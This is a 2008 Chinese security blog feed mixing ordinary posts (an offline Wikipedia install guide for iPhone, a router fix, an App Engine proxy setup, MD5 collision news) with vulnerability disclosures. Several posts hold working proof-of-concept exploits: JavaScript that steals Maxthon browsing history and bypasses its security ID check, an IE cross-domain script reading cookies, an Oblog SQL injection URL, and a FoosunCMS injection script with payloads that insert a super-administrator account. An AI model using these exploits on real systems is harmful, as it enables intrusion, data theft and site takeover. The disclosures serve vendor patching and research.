鬼仔's Blog

iPhone上的离线维基百科（附安装方法）

鬼仔 — Wed, 02 Jul 2008 20:49:55 +0800

原帖见此。

Wiki2Touch：http://code.google.com/p/wiki2touch/
Wiki2Touch的界面截图：http://www.haukap.com/wiki2touch/

但是原帖写的很乱，我刚开始都没看懂什么意思。整理了下，说下我的安装方法（文章中的软件，工具及数据都是发日志时最新的，请自行查找更新的版本，我是在windows下做的）：

1、到维基网页下载想安装的维基数据包 http://download.wikimedia.org/backup-index.html
中文维基是zhwiki，我下载的是08年6月25日的数据，也是目前最新的：
下载页面：http://download.wikimedia.org/zhwiki/20080625/
一般只需要pages-articles.xml.bz2就够了，直接下载地址：zhwiki-20080625-pages-articles.xml.bz2

2、下载Wiki2TouchUtils_Win_065.zip，解压缩。（到此查找新版本）
将下载得到的zhwiki-20080625-pages-articles.xml.bz2跟上面解压得到的indexer.exe放于同一目录下，到命令行下切换到indexer.exe所在目录
然后运行“indexer -d 档案名”
这里我运行的是“indexer -d zhwiki-20080625-pages-articles.xml.bz2”
待运行完毕之后得到articles.bin和images.txt两个文件。

3、在Installer中加入源http://168weedon.com/i，到Temporary中找到Wiki2Touch，安装。

4、通过iPhone PC Suite或者ssh，把articles.bin和images.txt上传到iPhone上的
/private/var/mobile/Media/Wikipedia/zh （1.1.4）下
/private/var/root/Media/Wikipedia/zh （1.1.3以下）下

在1.1.3／1.1.4下请以ssh /terminal 以root 身份输入以下指令，可大幅加速页面显示速度：
chown -R mobile:mobile /var/mobile/Media/Wikipedia

5、iphone中打开Wiki2Touch
填好Port (默认就行)
Expend template 就是把页面上的模版都解开显示出来, On 的话页面会比较漂亮但较慢, 而且有些资料不把这项打开是显示不出来的.每次重开机也需要Enable 一遍.
然后Launch Browser 即可直接进入维基介面.

在介面里可直接使用中文进行查询, 找到想看的条目后点击即可.
另,如果安装了多语言维基, 在寻找时只要加入"语言:"即可找到想要的条目, 如"zh:孔子" "en:iPhone"等

按上面的安装方法安装后, 所有条目都没有图像, 这是因为维基上图像实在太多, 而且没有一个有系统的方法下载全部图像, 所以一般离线维基都不会附图

图像的安装方法:
地址：http://8iz.biz/iphone/wiki060/zhwiki/images.rar（不清楚这个是哪天做的）

解压缩后把images.bin 传到iPhone 和articles.bin 放一起就可以
大约有90%的图像都能显示

自制图像包：
Windows 机器一台, 2GB硬盘空间, 十小时不间断挂网
iPhone, 至少有800MB 空间
Wiki2TouchUtils_Win_065.zip
上面生成的image.txt
ImageGetter_1_01.zip

把ImageGetter_1_0.zip 解开, 在bin/Release内有ImageGetter.exe
把它和image.txt 放到一起
双点ImageGetter.exe, 在Language code 填zh 按Go
挂网等候十小时, 会生成约800MB 大的Images 档案夹
生成后, 从Wiki2TouchUtils_Win_060.zip拿到pack.exe , 把它也和ImageGetter.exe 放到一起
使用Command prompt 输入: pack zh Images
这一步会生成一个images.bin (约600MB)
最后把images.bin 传到iPhone 和articles.bin 放一起就可以

==============================================

发表评论 | 分类：工具收集
本文网址：http://huaidan.org/archives/2121.html

© 鬼仔 for 鬼仔's Blog, 2008. | Add to del.icio.us digg | Who's linking ? Technorati Google BlogPulse.

UpnpFuzz

鬼仔 — Wed, 02 Jul 2008 18:01:50 +0800

作者：cnqing

这个东西是去年当哥提出来的，据说一些后门木马也用Upnp做NAT了。当然UpnpFuzz不仅仅是开Nat，当我不知道路由密码，而路由开启了Upnp的时候，用它就很容易的把自己映射到外网了。撇开功能不谈，Upnp 还是比较具有前瞻性的。
UpnpFuzz是一个通用的无驱Upnp客户端可发现任意的Upnp设备扫描所有的方法和参数生成所有的执行方法使用方法选择扫描类型，点扫描，就会列出网络中存在的Upnp设备了。

Upnp协议的详细细节可参考 http://baike.baidu.com/view/277224.htm

截图：

下载地址： http://www.cncert.net/up_files/soft/upnpfuzz.rar

发表评论 | 分类：工具收集
本文网址：http://huaidan.org/archives/2120.html

© 鬼仔 for 鬼仔's Blog, 2008. | Add to del.icio.us digg | Who's linking ? Technorati Google BlogPulse.

遨游修复的几个安全漏洞

鬼仔 — Tue, 01 Jul 2008 14:31:25 +0800

来源：80sec

在80sec通知遨游存在的安全漏洞之后，遨游于6.30号发布了新版的浏览器，修复了前面提到的安全漏洞，具体更新可以见http://blog.maxthon.cn/，此次更新修复了三个安全问题，主要的问题细节如下：

漏洞来源：http://www.80sec.com/release/maxthon-vulns-poc.txt

1 浏览器内核漏洞导致的本地跨域漏洞

漏洞说明：maxthon采用了系统的IE内核，但是该内核可能存在一些安全漏洞导致跨域攻击，而遨游的max:等的域是在本地等同于file://，所以这个跨域攻击将导致在本地上下文中执行javascript代码，这里只给出取得遨游浏览历史记录的POC。

漏洞POC：


<a href="">Maxthon Exploit</a>
<script>
function win(){
x=window.open("max:history");
setTimeout(function(){
x.location=new String("javascript:x=maxHistory.history.list.site.loadData();for(i=0;i<x.length;i++) document.write(x[i].site+\”<br>\”);”)
},3000)
}
window.onload=function(){
for (i=0;i<document.links.length;i++) {
document.links[i].href=”javascript:win()”
}
}
</script>

漏洞修复：在IE内核修复之前，遨游新版本已经修复这个安全漏洞

2 遨游安全中心漏洞导致的远程修改任意用户设置

漏洞说明：遨游对IE内核的一些特性并不是十分了解，导致在处理一些特殊情况时出现安全漏洞。遨游的控制中心实际上就是一组 HTML+JAVASCRIPT，通过这些页面可以读取敏感数据，修改浏览器设置，下载文件等等。当然，遨游也有自己的安全策略，将那些HTML文件放到外部站点上并不能直接调用，因为遨游有一个安全控制策略，security.src，这个文件代码如下：


var max_security_id=''; var url=String(document.location).toLowerCase(); if(url.indexOf('file://')>-1&&url.indexOf('http://')==-1&&url.indexOf('https://')==-1){ max_security_id='{B73B3AC9-B009-4429-AE67-514332D791FE}'; }else{ document.location='about:blank'; }

其中max_security_id是遨游在调用各种控件时必须的一个参数，这个参数在各个功能里是必须的，各个机器的max_security_id并不相同。如果我们能取得这个max_security_id那么就可以在远程任意站点调用遨游的各种功能譬如设置，读取敏感数据甚至是远程代码执行了。

首先，这个max_security_id每次启动貌似都会更改，这个max_security_id会存储在安装目录的template/security.src里，而我们可以在自己的站点页面里做如下调用：


<script src="E:\Program Files\Maxthon2\template\security.src"></script>
<script src="d:\Program Files\Maxthon2\template\security.src"></script>
<script src="c:\Program Files\Maxthon2\template\security.src"></script>

别意外，遨游是允许做这样调用本地文件的：），但是security.src也是有限制的，只有当location里包含file:///并且不包含http://和https:///的时候才会赋值，否则会跳转。这里遨游有个错误就是黑名单策略导致可以使用譬如ftp://的协议饶过，至于想包含 file://也很简单：


ftp://www.foo.com/exploit.html#file://80sec.com

这样一个地址实际访问的是exploit.html，但是location却包含file://，安全策略被饶过，可以取得max_security_id，然后利用取得的max_security_id可以做一切操作。

漏洞POC：

搭建一个匿名ftp服务器www.foo.com，然后在恶意站点做如下引用：


<iframe src="ftp://www.foo.com/history/index.htm#file:///www.80sec.com" width=100% height=100%>

/history/index.htm为放在www.foo.com上的精心构造的exploit，最简单的方式就是将官方安装目录里的template里的history等子目录下面的index.html里的


<script type="text/javascript" src="../security.src"></script>

换成


<script src="E:\Program Files\Maxthon2\template\security.src"></script>
<script src="d:\Program Files\Maxthon2\template\security.src"></script>
<script src="c:\Program Files\Maxthon2\template\security.src"></script>

通过修改里面的index.htm内容就可以修改浏览器设置，读取历史记录等等

漏洞修复：新版本将代码修正为


var max_security_id=''; if(String(window.document.location).toLowerCase().indexOf('file://')==0){ max_security_id='{02E14D94-53C8-4B6D-89AE-755DC5299C6C}'; }else{ document.location='about:blank'; }

限定只能本地文件能引用这个js，修复了这个问题。

3 RSS订阅跨站脚本漏洞

漏洞说明：遨游在实现rss功能时存在问题，导致在访问有问题的页面时会出现xss漏洞

漏洞POC：订阅http://www.80sec.com/feed就可以看到效果：）

漏洞修复：新版本已经修复

Maxthon对待漏洞的态度非常严谨,希望Maxthon用户尽快升级到新版.

本站内容均为原创，转载请务必保留署名与链接！
遨游修复的几个安全漏洞:http://www.80sec.com/maxthon-vulns-poc.html

发表评论 | 分类：技术文章
本文网址：http://huaidan.org/archives/2118.html

© 鬼仔 for 鬼仔's Blog, 2008. | Add to del.icio.us digg | Who's linking ? Technorati Google BlogPulse.

关于minimize attack surface

鬼仔 — Tue, 01 Jul 2008 00:32:26 +0800

BY:刺

最近看到又有老外讲到这一点，先扯扯我的体会。

minimize attack surface就是要尽量减少可能被攻击的点。

从战略上来讲，就是解决或者隐藏自己的弱点。

要做到这点，首先需要的就是一个好的架构。

好的架构，可以节省很多事情，从服务器部署方式，网络拓跋结构，使用什么语言，使用什么平台框架，使用什么DB，ACL如何做，如果统一发布、升级、回滚、监控。

在设计一个系统之初，如果能够考虑到这些因素，对minimize attack surface是非常有帮助的，能够起到最佳的效果。

简单来说，比如流程上的逻辑漏洞（就是类似那种step1直接跳到step3的），可能就涉及到了页面控制、webflow等，如果采用spring框架，用配置文件来管理页面流程，就有了一个可控的途径。

虽然框架是死的，不能说用了spring就能完全杜绝这种漏洞；但人是活的，如果有良好的制度保证每个流程都是规范的，都有人review，那么就能把这种漏洞杜绝掉。

再比如说注射，如果数据持久层设计的好，那么注射的风险是可以在人的控制下杜绝掉的。比如使用ibatis，使用sqlmap等，有人来review是否有做变量绑定。

好的架构是缩小攻击面的第一步，那么有的系统已经设计好了，你很难去改变架构，这时候该怎么办呢？

失去最有效率的方法后，只能从别的方面补救。

我们需要尽可能利用科学的方法，做到没有遗漏攻击途径。

首先，要明确需要保护的是什么，什么才是最重要的东西。

这个最重要的东西不一定是BOSS说的，因为很多时候BOSS对于安全的嗅觉不够敏感，这时候就需要安全人员去引导，去访谈。

确定好要保护好的东西后，再分析数据流图。

可能很多人会觉得这样太麻烦了，但我这里讲的是一套科学的方法，而不是拍拍脑袋就能够得出结论的“经验流”，这样得出的结论才有信服力。所以，如果你想让你的老板觉得你足够严谨，那么还是老老实实的分析下数据流图吧！

根据数据流图，你就可以看到正常的、非正常的可以接触到你需要保护的资产的途径了。

你保护的资产可能是一个db，可能是一个vlan，也可能是你BOSS电脑里的小电影。根据不同的资产种类，和到达资产的途径，你就可以开始设计你的安全体系了。

首先根据你的分析结果，看看结合现在的架构，有什么是可以做到彻底杜绝的，有什么是可以慢慢控制收敛的。

比如你担心“员工电脑被木马控制“，那么是否可以让员工只拥有user权限，是否可以升级办公PC到vista，是否可以要求只能使用内部代理上网，是否可以限制办公环境的PC只能上指定网站，是否需要把客服部门单独孤立出来。

这些，就是可以让”员工电脑被木马控制“这一个威胁得到收敛的有效措施。

可以根据你设计的深度防御体系，从各个层面来加以保护。如果要我起个名字，我可以把这种多层次防护叫做： Defense-Stack

Defense-Stack 和 Attack-Surface 是可以正交的，正交的那些点，就是以后工作的焦点和重点。

最后需要注意的是，制度是需要有人维护的，加入了人的因素，才能真正做到minimize attack surface，让你的防御体系转起来。

想法都比较零碎，还没系统的整理过，先讲到这里，以后再补充。

发表评论 | 分类：技术文章
本文网址：http://huaidan.org/archives/2117.html

© 鬼仔 for 鬼仔's Blog, 2008. | Add to del.icio.us digg | Who's linking ? Technorati Google BlogPulse.

Microsoft IE location及location.href绕过跨域安全限制漏洞

鬼仔 — Tue, 01 Jul 2008 00:31:34 +0800

发布日期：2008-06-26
更新日期：2008-06-27

受影响系统：

Microsoft Internet Explorer 6.0
- Microsoft Windows XP SP2

描述：BUGTRAQ ID: 29960

Internet Explorer是微软发布的非常流行的WEB浏览器。

IE没有正确地处理窗口对象的location或location.href属性，如果用户受骗访问了恶意站点的话，就会绕过跨域安全限制，在用户浏览器会话中执行任意指令。

这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏，没有考虑清楚不同域有继承关系的window对象操作后的变化，只是对window对象的一些方法的参数做了类似数据类型的限制，导致最后绕过限制跨域执行了脚本。

<*来源：rayh4c （rayh4c@80sec.com）

链接：http://secunia.com/advisories/30857/
http://blogs.zdnet.com/security/?p=1348
http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x02_0x04.txt
http://www.kb.cert.org/vuls/id/923508
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
<a href="">IE6 Cross Domain Scripting</a>
<script>
function win(){
x=window.open('http://www.phpwind.net');
setTimeout(function(){
x.location=new String("javascript:alert(document.cookie)")
},3000)
}
window.onload=function(){
for (i=0;i<document.links.length;i++) {
document.links.href="javascript:win()"
}
}
</script>

建议：厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

发表评论 | 分类：技术文章
本文网址：http://huaidan.org/archives/2116.html

© 鬼仔 for 鬼仔's Blog, 2008. | Add to del.icio.us digg | Who's linking ? Technorati Google BlogPulse.

Oblog最新注入漏洞分析(已修补)

鬼仔 — Mon, 30 Jun 2008 13:08:03 +0800

Date：2008-5-15
Author：Yamato[BCT]
Version：Oblog 4.5-4.6 sql

代码分析：

文件In/Class_UserCommand.asp :

strMonth=Request("month") //第63行

strDay=Request("day")

……

Case "month" //第84行

Dim LastDay

G_P_FileName = G_P_FileName & "month&month=" & strMonth

strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01"

mYear=Left(strMonth,4)

mMonth=Right(strMonth,2)

If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then

LastDay = "31"……

Else //第109行

SqlPart = " And Addtime >='"&strMonth&"01' AND Addtime < '"&strMonth&LastDay&"' "

构造合适的变量strMonth进行注射

测试方法:

http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01

strDay变量从month中获得日期数据，并判断strDay是否为日期数据。所以构造的注射语句为：

http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01

执行sql语句采用rst.Open strSql,Conn,1,1

不能修改记录集.

发表评论 | 分类：技术文章
本文网址：http://huaidan.org/archives/2115.html

© 鬼仔 for 鬼仔's Blog, 2008. | Add to del.icio.us digg | Who's linking ? Technorati Google BlogPulse.

TP-Link TL-WR541G+ 无故自动重启的解决办法

鬼仔 — Sun, 29 Jun 2008 21:06:26 +0800

自从买了这个无线路由就一直存在这个问题，刚开始以为是路由的问题，专门跑去换了一个，结果问题依然存在。发邮件给tp-link的客服，他们第一个反应竟然是让我去看看无线的密码是不是被人猜到了，是否别人认为重启的。排除这个原因，他们又让我关掉无线功能，还是不行。
后来看到这样一个消息：Windows XP SP3会引起路由器崩溃，然后就想着等有空了把sp3卸载了试试。当时发邮件给tp-link的客服，问他们是否sp3会引起这个问题，他们说WR541G+这款不会受sp3影响。

昨天又试着搜下看看有没有人跟我遇到同样的问题，结果还真被我搜到了。

解决办法如下：

1、在 “安全设置”->“防火墙设置”里勾选“开启防火墙（防火墙的总开关）”
2、在 “安全设置”->“高级安全设置”勾选和启用所有功能，参数全部默认。

昨天我这样设置之后，到现在还没有再发生过无故自动重启的问题。

发表评论 | 分类：乱七八糟
本文网址：http://huaidan.org/archives/2114.html

© 鬼仔 for 鬼仔's Blog, 2008. | Add to del.icio.us digg | Who's linking ? Technorati Google BlogPulse.

FoosunCMS Sql Injection Vulnerability

鬼仔 — Sun, 29 Jun 2008 13:14:54 +0800

--==+=================== www.nspcn.org =================+==--
--==+ FoosunCMS (API_Response.asp) Remote SQL Injection Exploit +==--
--==+===================================================+==--

#Author: Tr4c3[at]126[dot]com
#版权所有: http://www.nspcn.org & [BK瞬间群]
#漏洞文件 API/API_Response.asp
#影响版本:
v4.0 Sp5[其他版本未看]
#漏洞原因:
变量username未经过滤传值，带入sql执行，导致注入产生。
#关键代码：

If CheckPost() Then
Select Case Act
Case "checkname" '触发注入
Checkname()
CheckPost()函数原型在行73-96，username由此获取值，代码如下:
XmlDoc.documentElement.selectSingleNode("username")
Checkname()函数在行233-254，代码如下：
Sub Checkname()
Dim UserEmail
Dim Temp_tr,i,Rs,Sql
UserEmail = Trim(XmlDoc.documentElement.selectSingleNode("email").text)
If Messenge<>"" Then
'输出错误信息
Status = 1
Exit Sub
End If
Sql="select UserName,Email From FS_ME_Users where UserName = '"& UserName &"'" '在此带入sql执行
Set Rs = User_Conn.Execute(Sql)
If Not Rs.Eof And Not Rs.Bof Then
Messenge = "您填写的用户名已经被注册。"
Status = 1
Exit Sub
Else
Status = 0
Messenge = "验证通过。"
End If
Rs.Close
Set Rs = Nothing
End Sub

利用的关键在于让CheckPost()为真，代码如下：
Dim NewMd5,OldMd5
NewMd5 = Md5(UserName&API_SysKey,16) 'Const API_SysKey = "API_TEST"
OldMd5 = Md5(UserName&API_SysKey,16)

If Syskey=NewMd5 or Syskey=OldMd5 Then
CheckPost = True
Else
Status = 1
Messenge = Messenge & "<li>请求数据验证不通过，请与管理员联系。"
End If
API_SysKey在Api_Config.asp里16行被设置
Const API_SysKey = "API_TEST"
把注入语句 & API_SysKey 进行一次md5加密之后的16位hash，赋值给syskey就可以了。
###Poc：
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem   风讯4.0 sp5[mssql] 注入漏洞测试脚本 By Tr4c3[at]126[dot]com
Rem   更多信息请关注:
Rem      网安阵线 http://www.nspcn.org/
Rem      web安全手册 http://www.tr4c3.com/
Rem      BK瞬间[qq群]
Rem   转载请保留以上版权
Dim strData, strUrl, strGetinfo, xPost
strData = "<body><userip>999.999.999.999</userip><email>body@baidu.com</email><action>checkname</action><syskey>b77c8e0d7a0784d5</syskey><appid>FoosunCMS</appid><username>'</username></body>"
strUrl = "http://demo.foosun.net/api/API_Response.asp"
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "POST", strUrl, False
xPost.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
xPost.SetRequestHeader "Referer", strUrl
xPost.send(strData)
'strGetinfo = xPost.ResponseText
strGetinfo = bytes2BSTR(xPost.ResponseBody)
Wscript.echo(strGetinfo)
Wscript.Quit
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem 将返回内容转换成简体中文
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem ';insert into FS_MF_Admin (Admin_Name,Admin_Pass_Word)values('Tr4c3','83aa400af464c76d')-- 添加一个普通管理员Tr4c3,密码12345678
Rem ';update FS_MF_Admin set Admin_Is_Super=1 where Admin_Name='Tr4c3'-- 把Tr4c3提升为超级管理员
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

发表评论 | 分类：工具收集
本文网址：http://huaidan.org/archives/2112.html

© 鬼仔 for 鬼仔's Blog, 2008. | Add to del.icio.us digg | Who's linking ? Technorati Google BlogPulse.

利用App Engine架设自己的Proxy

鬼仔 — Sat, 28 Jun 2008 22:39:04 +0800

来源：Q's blog

这里只是说一下个人的架设经过。
首先说一下我用的是Vista。
下载并安装Python环境。（默认安装的）
http://python.org/download
我用的是 Python 2.5.2 Windows installer
下载并安装Google App Engine SDK。（默认安装的）
http://code.google.com/appengine/downloads.html
下载gappproxy。
http://code.google.com/p/gappproxy/

下载app.yaml.fragment，fetch.py，proxy.py三个文件。

在Google App Engine SDK安装目录里新建文件夹daili，把上边的三个文件拷贝到该文件夹。

把app.yaml.fragment改名为app.yaml, 并用编辑器打开，修改内容如下：
application: daili （为什么是daili呢，因为我的app engine是daili.appspot.com）
version: 1
runtime: python
api_version: 1

handlers:
- url: /fetch.py
script: fetch.py

调出命令行
进入Google App Engine SDK目录
appcfg.py update daili
会提示你输入google帐户

修改proxy.py文件
改成你的app engine 域名： 'http://daili.appspot.com/fetch.py'

双击运行proxy.py（使用代理期间不要关闭该窗口）
打开Firefox，修改foxyproxy端口为8000

OK，一切就绪，在Firefox地址栏输入 http://quanmengli.tumblr.com/，OMG！成功啦

这个方法仅支持标准80端口的HTTP协议，无法支持https及其他协议，这与Google App Engine平台限制有关。

发表评论 | 分类：技术文章
本文网址：http://huaidan.org/archives/2111.html

© 鬼仔 for 鬼仔's Blog, 2008. | Add to del.icio.us digg | Who's linking ? Technorati Google BlogPulse.

可执行文件的 MD5 碰撞

鬼仔 — Sat, 28 Jun 2008 19:30:11 +0800

来源：cnbeta

原来我总是很自信地以为:你有本事找到 MD5 的碰撞又如何?你难道还有本事让两个可执行文件的 MD5 一样,却又都能正常运行,并且可以做完全不同的事情么?
答:还真的可以.

http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe

http://www.win.tue.nl/hashclash/SoftIntCodeSign/GoodbyeWorld-colliding.exe

这两个程序会在屏幕上打印出不同的字符，但是它们的 MD5 都是一样的。

通读其论文后摘要如下：

这几位密码学家使用的是“构造前缀碰撞法”（chosen-prefix collisions）来进行此次攻击（是王小云所使用的攻击方法的改进版本）。

他们所使用的计算机是一台 Sony PS3，且仅用了不到两天。

他们的结论：MD5 算法不应再被用于任何软件完整性检查或代码签名的用途。

另：现在，如果仅仅是想要生成 MD5 相同而内容不同的文件的话，在任何主流配置的电脑上用几秒钟就可以完成了。

这几位密码学家编写的“快速 MD5 碰撞生成器”：http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip
源代码：http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip

发表评论 | 分类：乱七八糟
本文网址：http://huaidan.org/archives/2110.html

© 鬼仔 for 鬼仔's Blog, 2008. | Add to del.icio.us digg | Who's linking ? Technorati Google BlogPulse.

鬼仔's Blog

iPhone上的离线维基百科（附安装方法）

相关日志

UpnpFuzz

相关日志

遨游修复的几个安全漏洞

相关日志

关于minimize attack surface

相关日志

Microsoft IE location及location.href绕过跨域安全限制漏洞

相关日志

Oblog最新注入漏洞分析(已修补)

相关日志

TP-Link TL-WR541G+ 无故自动重启的解决办法

相关日志

FoosunCMS Sql Injection Vulnerability

相关日志

利用App Engine架设自己的Proxy

相关日志

可执行文件的 MD5 碰撞

相关日志